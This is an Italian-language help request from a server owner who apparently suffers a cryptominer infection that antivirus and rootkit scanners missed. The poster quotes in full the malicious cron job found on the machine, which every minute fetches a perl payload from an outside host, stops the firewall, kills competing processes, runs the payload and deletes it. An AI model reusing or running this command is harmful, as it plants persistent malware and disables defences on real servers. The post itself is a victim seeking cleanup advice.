Ho installato i rilevatori di Clamav e rootkit e non hanno trovato nulla.
Il virus esegue alcuni processi denominati moduli che mangiano cpu, il mio server venditore mi ha detto che è un virus bitcoin miner ma non mi hanno dato altre informazioni. L'unica cosa che ho scoperto è questo cronjob:
* * * * * curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish
Ho ucciso tutto il processo e rimosso il cronjob. La cartella / tmp è vuota. Il problema è che non ho trovato il "problema" di base. Cos'altro posso fare?